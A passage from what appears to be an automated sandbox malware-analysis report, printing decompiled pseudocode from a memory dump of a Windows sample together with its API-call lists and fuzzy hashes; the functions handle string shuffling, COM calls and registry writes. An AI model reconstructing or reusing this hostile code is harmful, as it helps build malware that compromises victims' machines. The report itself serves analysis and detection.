                                                          							 *0x495d2c8 = _t36;
                                                          							__eflags = _t36;
                                                          							if(_t36 == 0) {
                                                          								_push(8);
                                                          								_pop(0);
                                                          							} else {
                                                          								_t56 =  *0x495d25c; // 0x4000000a
                                                          								_t61 = _t56 & 0x000000ff;
                                                          								_t58 =  *0x495d2a8; // 0x47a5a8
                                                          								_t13 = _t58 + 0x495e55a; // 0x697a6f4d
                                                          								_t55 = _t13;
                                                          								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x495c287);
                                                          							}
                                                          							_t54 = 0;
                                                          							__eflags = 0;
                                                          							if(0 == 0) {
                                                          								asm("sbb eax, eax");
                                                          								E04959135( ~_v8 &  *0x495d270,  &E0495D00C); // executed
                                                          								_t54 = E0495888E(_t55);
                                                          								__eflags = _t54;
                                                          								if(_t54 != 0) {
                                                          									goto L30;
                                                          								}
                                                          								_t43 = E049587AE(); // executed
                                                          								__eflags = _t43;
                                                          								if(_t43 != 0) {
                                                          									__eflags = _v8;
                                                          									_t65 = _v12;
                                                          									if(_v8 != 0) {
                                                          										L29:
                                                          										_t44 = E049551B0(_t61, _t65, _v8); // executed
                                                          										_t54 = _t44;
                                                          										goto L30;
                                                          									}
                                                          									__eflags = _t65;
                                                          									if(__eflags == 0) {
                                                          										goto L30;
                                                          									}
                                                          									_t54 = E04951C66(__eflags,  &(_t65[4]));
                                                          									__eflags = _t54;
                                                          									if(_t54 == 0) {
                                                          										goto L30;
                                                          									}
                                                          									goto L29;
                                                          								}
                                                          								_t54 = 8;
                                                          							}
                                                          						}
                                                          					} else {
                                                          						_t66 = _v12;
                                                          						if(_t66 == 0) {
                                                          							L30:
                                                          							if(_v16 == 0 || _v16 == 1) {
                                                          								 *0x495d15c();
                                                          							}
                                                          							goto L34;
                                                          						}
                                                          						_t67 =  &(_t66[4]);
                                                          						do {
                                                          						} while (E0495A273(_t62, _t67, 0, 1) == 0x4c7);
                                                          					}
                                                          					goto L30;
                                                          				} else {
                                                          					_t54 = _t22;
                                                          					L34:
                                                          					return _t54;
                                                          				}
                                                          			}

                                                          APIs
                                                            • Part of subcall function 04956C09: GetModuleHandleA.KERNEL32(4C44544E,00000000,04955BBB,00000000,00000000), ref: 04956C18
                                                          • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 04955C38
                                                            • Part of subcall function 0495A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04955595), ref: 0495A72B
                                                          • memset.NTDLL ref: 04955C87
                                                          • RtlInitializeCriticalSection.NTDLL(04DD9570), ref: 04955C98
                                                            • Part of subcall function 04951C66: memset.NTDLL ref: 04951C7B
                                                            • Part of subcall function 04951C66: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04951CBD
                                                            • Part of subcall function 04951C66: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 04951CC8
                                                          • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 04955CC3
                                                          • wsprintfA.USER32 ref: 04955CF3
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                          • String ID:
                                                          • API String ID: 4246211962-0
                                                          • Opcode ID: ff3d167f9547a1935b4af93a453108b1b2b0758142ccc706d8d53d2ca577b999
                                                          • Instruction ID: 38a12ab579e33c87b7b6e05ef0bf1a1098c881c27bbc4efe7c0401b26de9f288
                                                          • Opcode Fuzzy Hash: ff3d167f9547a1935b4af93a453108b1b2b0758142ccc706d8d53d2ca577b999
                                                          • Instruction Fuzzy Hash: CE51F472A04314BBEB21EBA0E848F5E7BBCEB44724F358535ED01D7166E678B941CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 22%
                                                          			E049562DA(signed int __eax, signed int _a4, signed int _a8) {
                                                          				signed int _v8;
                                                          				signed int _v12;
                                                          				intOrPtr _v16;
                                                          				signed int _v20;
                                                          				intOrPtr _t81;
                                                          				char _t83;
                                                          				signed int _t90;
                                                          				signed int _t97;
                                                          				signed int _t99;
                                                          				char _t101;
                                                          				unsigned int _t102;
                                                          				intOrPtr _t103;
                                                          				char* _t107;
                                                          				signed int _t110;
                                                          				signed int _t113;
                                                          				signed int _t118;
                                                          				signed int _t122;
                                                          				intOrPtr _t124;
                                                          
                                                          				_t102 = _a8;
                                                          				_t118 = 0;
                                                          				_v20 = __eax;
                                                          				_t122 = (_t102 >> 2) + 1;
                                                          				_v8 = 0;
                                                          				_a8 = 0;
                                                          				_t81 = E0495A71F(_t122 << 2);
                                                          				_v16 = _t81;
                                                          				if(_t81 == 0) {
                                                          					_push(8);
                                                          					_pop(0);
                                                          					L37:
                                                          					return 0;
                                                          				}
                                                          				_t107 = _a4;
                                                          				_a4 = _t102;
                                                          				_t113 = 0;
                                                          				while(1) {
                                                          					_t83 =  *_t107;
                                                          					if(_t83 == 0) {
                                                          						break;
                                                          					}
                                                          					if(_t83 == 0xd || _t83 == 0xa) {
                                                          						if(_t118 != 0) {
                                                          							if(_t118 > _v8) {
                                                          								_v8 = _t118;
                                                          							}
                                                          							_a8 = _a8 + 1;
                                                          							_t118 = 0;
                                                          						}
                                                          						 *_t107 = 0;
                                                          						goto L16;
                                                          					} else {
                                                          						if(_t118 != 0) {
                                                          							L10:
                                                          							_t118 = _t118 + 1;
                                                          							L16:
                                                          							_t107 = _t107 + 1;
                                                          							_t15 =  &_a4;
                                                          							 *_t15 = _a4 - 1;
                                                          							if( *_t15 != 0) {
                                                          								continue;
                                                          							}
                                                          							break;
                                                          						}
                                                          						if(_t113 == _t122) {
                                                          							L21:
                                                          							if(_a8 <= 0x20) {
                                                          								_push(0xb);
                                                          								L34:
                                                          								_pop(0);
                                                          								L35:
                                                          								E0495A734(_v16);
                                                          								goto L37;
                                                          							}
                                                          							_t24 = _v8 + 5; // 0xcdd8d2f8
                                                          							_t103 = E0495A71F((_v8 + _t24) * _a8 + 4);
                                                          							if(_t103 == 0) {
                                                          								_push(8);
                                                          								goto L34;
                                                          							}
                                                          							_t90 = _a8;
                                                          							_a4 = _a4 & 0x00000000;
                                                          							_v8 = _v8 & 0x00000000;
                                                          							_t124 = _t103 + _t90 * 4;
                                                          							if(_t90 <= 0) {
                                                          								L31:
                                                          								 *0x495d278 = _t103;
                                                          								goto L35;
                                                          							}
                                                          							do {
                                                          								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
                                                          								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
                                                          								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
                                                          								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
                                                          								_v12 = _v12 & 0x00000000;
                                                          								if(_a4 <= 0) {
                                                          									goto L30;
                                                          								} else {
                                                          									goto L26;
                                                          								}
                                                          								while(1) {
                                                          									L26:
                                                          									_t99 = _v12;
                                                          									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
                                                          									if(_t99 == 0) {
                                                          										break;
                                                          									}
                                                          									_v12 = _v12 + 1;
                                                          									if(_v12 < _a4) {
                                                          										continue;
                                                          									}
                                                          									goto L30;
                                                          								}
                                                          								_v8 = _v8 - 1;
                                                          								L30:
                                                          								_t97 = _a4;
                                                          								_a4 = _a4 + 1;
                                                          								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
                                                          								__imp__(_t124);
                                                          								_v8 = _v8 + 1;
                                                          								_t124 = _t124 + _t97 + 1;
                                                          							} while (_v8 < _a8);
                                                          							goto L31;
                                                          						}
                                                          						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
                                                          						_t101 = _t83;
                                                          						if(_t83 - 0x61 <= 0x19) {
                                                          							_t101 = _t101 - 0x20;
                                                          						}
                                                          						 *_t107 = _t101;
                                                          						_t113 = _t113 + 1;
                                                          						goto L10;
                                                          					}
                                                          				}
                                                          				if(_t118 != 0) {
                                                          					if(_t118 > _v8) {
                                                          						_v8 = _t118;
                                                          					}
                                                          					_a8 = _a8 + 1;
                                                          				}
                                                          				goto L21;
                                                          			}
                                                          0x0495636d
                                                          0x0495636d
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 0495A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04955595), ref: 0495A72B
                                                          • lstrcpy.KERNEL32(63699BC4,00000020), ref: 049563D7
                                                          • lstrcat.KERNEL32(63699BC4,00000020), ref: 049563EC
                                                          • lstrcmp.KERNEL32(00000000,63699BC4), ref: 04956403
                                                          • lstrlen.KERNEL32(63699BC4), ref: 04956427
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 3214092121-3916222277
                                                          • Opcode ID: 71331ca7f5d227030116a7961a2f4e2624999eb12075c319dbce4f500d5cb785
                                                          • Instruction ID: 097142f375a79c264387b63e232de2e0d30db580c05912ffbd32fc7b2aa4f3eb
                                                          • Opcode Fuzzy Hash: 71331ca7f5d227030116a7961a2f4e2624999eb12075c319dbce4f500d5cb785
                                                          • Instruction Fuzzy Hash: 8A51B271A04218EBDF21CF99C4846ADBBBAFF55315F648076EC199B221C770BE42CB40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SysAllocString.OLEAUT32(80000002), ref: 04953B0D
                                                          • SysAllocString.OLEAUT32(049585ED), ref: 04953B51
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04953B65
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04953B73
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: String$AllocFree
                                                          • String ID:
                                                          • API String ID: 344208780-0
                                                          • Opcode ID: f57e02b19ad4aa12e3e89a25a9d51c535e83d16503677bc12cde6ad0a413319a
                                                          • Instruction ID: d2beb27d87089fb61c99d6bd464fa0be819885364d3cb3b9ecec852f38ebf6bc
                                                          • Opcode Fuzzy Hash: f57e02b19ad4aa12e3e89a25a9d51c535e83d16503677bc12cde6ad0a413319a
                                                          • Instruction Fuzzy Hash: 62310E71900209EFDB14DF98D8C08AE7BB9FF48350B20852EFD0697260D775AA41CB65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 78%
                                                          			E04956545(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                                          				intOrPtr _v8;
                                                          				void* _v12;
                                                          				void* _v16;
                                                          				intOrPtr _t26;
                                                          				intOrPtr* _t28;
                                                          				intOrPtr _t31;
                                                          				intOrPtr* _t32;
                                                          				void* _t39;
                                                          				int _t46;
                                                          				intOrPtr* _t47;
                                                          				int _t48;
                                                          
                                                          				_t47 = __eax;
                                                          				_push( &_v12);
                                                          				_push(__eax);
                                                          				_t39 = 0;
                                                          				_t46 = 0; // executed
                                                          				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                                          				_v8 = _t26;
                                                          				if(_t26 < 0) {
                                                          					L13:
                                                          					return _v8;
                                                          				}
                                                          				if(_v12 == 0) {
                                                          					Sleep(0xc8);
                                                          					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                                          				}
                                                          				if(_v8 >= _t39) {
                                                          					_t28 = _v12;
                                                          					if(_t28 != 0) {
                                                          						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                                          						_v8 = _t31;
                                                          						if(_t31 >= 0) {
                                                          							_t46 = lstrlenW(_v16);
                                                          							if(_t46 != 0) {
                                                          								_t46 = _t46 + 1;
                                                          								_t48 = _t46 + _t46;
                                                          								_t39 = E0495A71F(_t48);
                                                          								if(_t39 == 0) {
                                                          									_v8 = 0x8007000e;
                                                          								} else {
                                                          									memcpy(_t39, _v16, _t48);
                                                          								}
                                                          								__imp__#6(_v16);
                                                          							}
                                                          						}
                                                          						_t32 = _v12;
                                                          						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                                          					}
                                                          					 *_a4 = _t39;
                                                          					 *_a8 = _t46 + _t46;
                                                          				}
                                                          				goto L13;
                                                          			}















                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: FreeSleepStringlstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 1198164300-0
                                                          • Opcode ID: 2e96149674f9158c8b248cababaafa8f6572607d03af2961f05878be1f3df9dc
                                                          • Instruction ID: 084b39c62adea02dad9023aaeda6b495a9a90d1b80426a0378b18aaae6af2724
                                                          • Opcode Fuzzy Hash: 2e96149674f9158c8b248cababaafa8f6572607d03af2961f05878be1f3df9dc
                                                          • Instruction Fuzzy Hash: 25214175900209EFDB11DFA8C98499EBBB9FF98314B2041B9ED46D7214EB30EE41DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E04958D14(void* __edx) {
                                                          				void* _v8;
                                                          				int _v12;
                                                          				WCHAR* _v16;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* _t23;
                                                          				intOrPtr _t24;
                                                          				intOrPtr _t32;
                                                          				intOrPtr _t35;
                                                          				void* _t37;
                                                          				intOrPtr _t38;
                                                          				intOrPtr _t42;
                                                          				void* _t45;
                                                          				void* _t50;
                                                          				void* _t52;
                                                          
                                                          				_t50 = __edx;
                                                          				_v12 = 0;
                                                          				_t23 = E0495A2F9(0,  &_v8); // executed
                                                          				if(_t23 != 0) {
                                                          					_v8 = 0;
                                                          				}
                                                          				_t24 =  *0x495d2a8; // 0x47a5a8
                                                          				_t4 = _t24 + 0x495edc0; // 0x4dd9368
                                                          				_t5 = _t24 + 0x495ed68; // 0x4f0053
                                                          				_t45 = E04955356( &_v16, _v8, _t5, _t4);
                                                          				if(_t45 == 0) {
                                                          					StrToIntExW(_v16, 0,  &_v12);
                                                          					_t45 = 8;
                                                          					if(_v12 < _t45) {
                                                          						_t45 = 1;
                                                          						__eflags = 1;
                                                          					} else {
                                                          						_t32 =  *0x495d2a8; // 0x47a5a8
                                                          						_t11 = _t32 + 0x495edb4; // 0x4dd935c
                                                          						_t48 = _t11;
                                                          						_t12 = _t32 + 0x495ed68; // 0x4f0053
                                                          						_t52 = E049545C6(_t11, _t12, _t11);
                                                          						_t59 = _t52;
                                                          						if(_t52 != 0) {
                                                          							_t35 =  *0x495d2a8; // 0x47a5a8
                                                          							_t13 = _t35 + 0x495edfe; // 0x30314549
                                                          							_t37 = E04958E27(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
                                                          							if(_t37 == 0) {
                                                          								_t61 =  *0x495d25c - 6;
                                                          								if( *0x495d25c <= 6) {
                                                          									_t42 =  *0x495d2a8; // 0x47a5a8
                                                          									_t15 = _t42 + 0x495ec0a; // 0x52384549
                                                          									E04958E27(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
                                                          								}
                                                          							}
                                                          							_t38 =  *0x495d2a8; // 0x47a5a8
                                                          							_t17 = _t38 + 0x495edf8; // 0x4dd93a0
                                                          							_t18 = _t38 + 0x495edd0; // 0x680043
                                                          							_t45 = E04955D7D(_v8, 0x80000001, _t52, _t18, _t17);
                                                          							HeapFree( *0x495d238, 0, _t52);
                                                          						}
                                                          					}
                                                          					HeapFree( *0x495d238, 0, _v16);
                                                          				}
                                                          				_t54 = _v8;
                                                          				if(_v8 != 0) {
                                                          					E04954F14(_t54);
                                                          				}
                                                          				return _t45;
                                                          			}



















                                                          APIs
                                                          • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04DD9368,00000000,?,74B5F710,00000000,74B5F730), ref: 04958D63
                                                          • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04DD93A0,?,00000000,30314549,00000014,004F0053,04DD935C), ref: 04958E00
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,0495523E), ref: 04958E12
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: 991de7d490d24c77d5f9b7dd17589561cdbec0561b15fcb1a2ed7642f68d4ba6
                                                          • Instruction ID: 6e9f4f301def724f2a20635cb322d0a01a0f8ae096f2f0c514ad328980004ff6
                                                          • Opcode Fuzzy Hash: 991de7d490d24c77d5f9b7dd17589561cdbec0561b15fcb1a2ed7642f68d4ba6
                                                          • Instruction Fuzzy Hash: 61317C32900208BFEF11FB94EC88EAA7BBDEB44714F344275E9059B170E671AE58DB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 53%
                                                          			E0495A376(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                          				void* _v8;
                                                          				void* __edi;
                                                          				intOrPtr _t18;
                                                          				void* _t24;
                                                          				void* _t30;
                                                          				void* _t36;
                                                          				void* _t40;
                                                          				intOrPtr _t42;
                                                          
                                                          				_t36 = __edx;
                                                          				_t32 = __ecx;
                                                          				_push(__ecx);
                                                          				_push(__ecx);
                                                          				_t42 =  *0x495d340; // 0x4dd9a88
                                                          				_push(0x800);
                                                          				_push(0);
                                                          				_push( *0x495d238);
                                                          				if( *0x495d24c >= 5) {
                                                          					if(RtlAllocateHeap() == 0) {
                                                          						L6:
                                                          						_t30 = 8;
                                                          						L7:
                                                          						if(_t30 != 0) {
                                                          							L10:
                                                          							 *0x495d24c =  *0x495d24c + 1;
                                                          							L11:
                                                          							return _t30;
                                                          						}
                                                          						_t44 = _a4;
                                                          						_t40 = _v8;
                                                          						 *_a16 = _a4;
                                                          						 *_a20 = E04957306(_t44, _t40);
                                                          						_t18 = E04954A09(_t40, _t44);
                                                          						if(_t18 != 0) {
                                                          							 *_a8 = _t40;
                                                          							 *_a12 = _t18;
                                                          							if( *0x495d24c < 5) {
                                                          								 *0x495d24c =  *0x495d24c & 0x00000000;
                                                          							}
                                                          							goto L11;
                                                          						}
                                                          						_t30 = 0xbf;
                                                          						E04956761();
                                                          						RtlFreeHeap( *0x495d238, 0, _t40); // executed
                                                          						goto L10;
                                                          					}
                                                          					_t24 = E04951F13(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t13);
                                                          					L5:
                                                          					_t30 = _t24;
                                                          					goto L7;
                                                          				}
                                                          				if(RtlAllocateHeap() == 0) {
                                                          					goto L6;
                                                          				}
                                                          				_t24 = E04954AB6(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t25); // executed
                                                          				goto L5;
                                                          			}

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800,74B5F710), ref: 0495A39A
                                                            • Part of subcall function 04954AB6: GetTickCount.KERNEL32 ref: 04954ACA
                                                            • Part of subcall function 04954AB6: wsprintfA.USER32 ref: 04954B1A
                                                            • Part of subcall function 04954AB6: wsprintfA.USER32 ref: 04954B37
                                                            • Part of subcall function 04954AB6: wsprintfA.USER32 ref: 04954B63
                                                            • Part of subcall function 04954AB6: HeapFree.KERNEL32(00000000,?), ref: 04954B75
                                                            • Part of subcall function 04954AB6: wsprintfA.USER32 ref: 04954B96
                                                            • Part of subcall function 04954AB6: HeapFree.KERNEL32(00000000,?), ref: 04954BA6
                                                            • Part of subcall function 04954AB6: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04954BD4
                                                            • Part of subcall function 04954AB6: GetTickCount.KERNEL32 ref: 04954BE5
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800,74B5F710), ref: 0495A3B8
                                                          • RtlFreeHeap.NTDLL(00000000,00000002,04955289,?,04955289,00000002,?,?,04955D5E,?), ref: 0495A415
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Heap$wsprintf$AllocateFree$CountTick
                                                          • String ID:
                                                          • API String ID: 1676223858-0
                                                          • Opcode ID: 97c22eaa29d2df565ad6d7545672ae9894eb9979dc85a862838c37b03dee8b2c
                                                          • Instruction ID: d7622a24a12a69356a99e41b4da6c6ff814f4c231497bb8688dd36a4a446207f
                                                          • Opcode Fuzzy Hash: 97c22eaa29d2df565ad6d7545672ae9894eb9979dc85a862838c37b03dee8b2c
                                                          • Instruction Fuzzy Hash: 2B213D71204305EBDB11DF98E884E9A3BACEB84354F204235FD05DB160EB74ED419BA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 75%
                                                          			E0495219B(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                                          				void* _v8;
                                                          				void* __esi;
                                                          				intOrPtr* _t35;
                                                          				void* _t40;
                                                          				intOrPtr* _t41;
                                                          				intOrPtr* _t43;
                                                          				intOrPtr* _t45;
                                                          				intOrPtr* _t50;
                                                          				intOrPtr* _t52;
                                                          				void* _t54;
                                                          				intOrPtr* _t55;
                                                          				intOrPtr* _t57;
                                                          				intOrPtr* _t61;
                                                          				intOrPtr* _t65;
                                                          				intOrPtr _t68;
                                                          				void* _t72;
                                                          				void* _t75;
                                                          				void* _t76;
                                                          
                                                          				_t55 = _a4;
                                                          				_t35 =  *((intOrPtr*)(_t55 + 4));
                                                          				_a4 = 0;
                                                          				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                                          				if(_t76 < 0) {
                                                          					L18:
                                                          					return _t76;
                                                          				}
                                                          				_t40 = E04953AB0(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                                                          				_t76 = _t40;
                                                          				if(_t76 >= 0) {
                                                          					_t61 = _a28;
                                                          					if(_t61 != 0 &&  *_t61 != 0) {
                                                          						_t52 = _v8;
                                                          						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                                          					}
                                                          					if(_t76 >= 0) {
                                                          						_t43 =  *_t55;
                                                          						_t68 =  *0x495d2a8; // 0x47a5a8
                                                          						_t20 = _t68 + 0x495e1fc; // 0x740053
                                                          						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                                          						if(_t76 >= 0) {
                                                          							_t76 = E049557B4(_a4);
                                                          							if(_t76 >= 0) {
                                                          								_t65 = _a28;
                                                          								if(_t65 != 0 &&  *_t65 == 0) {
                                                          									_t50 = _a4;
                                                          									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                                          								}
                                                          							}
                                                          						}
                                                          						_t45 = _a4;
                                                          						if(_t45 != 0) {
                                                          							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                                          						}
                                                          						_t57 = __imp__#6;
                                                          						if(_a20 != 0) {
                                                          							 *_t57(_a20);
                                                          						}
                                                          						if(_a12 != 0) {
                                                          							 *_t57(_a12);
                                                          						}
                                                          					}
                                                          				}
                                                          				_t41 = _v8;
                                                          				 *((intOrPtr*)( *_t41 + 8))(_t41);
                                                          				goto L18;
                                                          			}

                                                          APIs
                                                            • Part of subcall function 04953AB0: SysAllocString.OLEAUT32(80000002), ref: 04953B0D
                                                            • Part of subcall function 04953AB0: SysFreeString.OLEAUT32(00000000), ref: 04953B73
                                                          • SysFreeString.OLEAUT32(?), ref: 0495227A
                                                          • SysFreeString.OLEAUT32(049585ED), ref: 04952284
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: String$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 986138563-0
                                                          • Opcode ID: e6293705fb9be229d0ae4037beadd2d36d2cdf60d3a5f4ca5cd47e9a9ef3b7ec
                                                          • Instruction ID: e958ef1755e81781ec1f3bc07a477ba8185e37bedd14f3d5c42ec8958aff0ebd
                                                          • Opcode Fuzzy Hash: e6293705fb9be229d0ae4037beadd2d36d2cdf60d3a5f4ca5cd47e9a9ef3b7ec
                                                          • Instruction Fuzzy Hash: F5315E76500219AFCB15DF94D888C9BBB7AFBC97407248AA8FC159B220D631ED51CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E04958E27(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                                                          				struct _FILETIME _v12;
                                                          				signed int _t11;
                                                          				void* _t16;
                                                          				short _t19;
                                                          				void* _t22;
                                                          				void* _t24;
                                                          				void* _t25;
                                                          				short* _t26;
                                                          
                                                          				_t24 = __edx;
                                                          				_t25 = E04959070(_t11, _a12);
                                                          				if(_t25 == 0) {
                                                          					_t22 = 8;
                                                          				} else {
                                                          					_t26 = _t25 + _a16 * 2;
                                                          					 *_t26 = 0; // executed
                                                          					_t16 = E049572C0(__ecx, _a4, _a8, _t25); // executed
                                                          					_t22 = _t16;
                                                          					if(_t22 == 0) {
                                                          						GetSystemTimeAsFileTime( &_v12);
                                                          						_t19 = 0x5f;
                                                          						 *_t26 = _t19;
                                                          						_t22 = E049522F1(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
                                                          					}
                                                          					HeapFree( *0x495d238, 0, _t25);
                                                          				}
                                                          				return _t22;
                                                          			}

                                                          APIs
                                                            • Part of subcall function 04959070: lstrlen.KERNEL32(?,00000000,04DD9A98,00000000,04958808,04DD9C76,?,?,?,?,?,63699BC3,00000005,0495D00C), ref: 04959077
                                                            • Part of subcall function 04959070: mbstowcs.NTDLL ref: 049590A0
                                                            • Part of subcall function 04959070: memset.NTDLL ref: 049590B2
                                                          • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74B05520,00000008,00000014,004F0053,04DD935C), ref: 04958E5F
                                                          • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74B05520,00000008,00000014,004F0053,04DD935C), ref: 04958E8D
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                                                          • String ID:
                                                          • API String ID: 1500278894-0
                                                          • Opcode ID: a08929bb598a79731458387abda47529e5c1de2e0bb3821e9b99d7ab14aae079
                                                          • Instruction ID: 909e4adc8cd75802d0f5887dd94f81d2833c1f1108b5295ad4726ef7e4e73acf
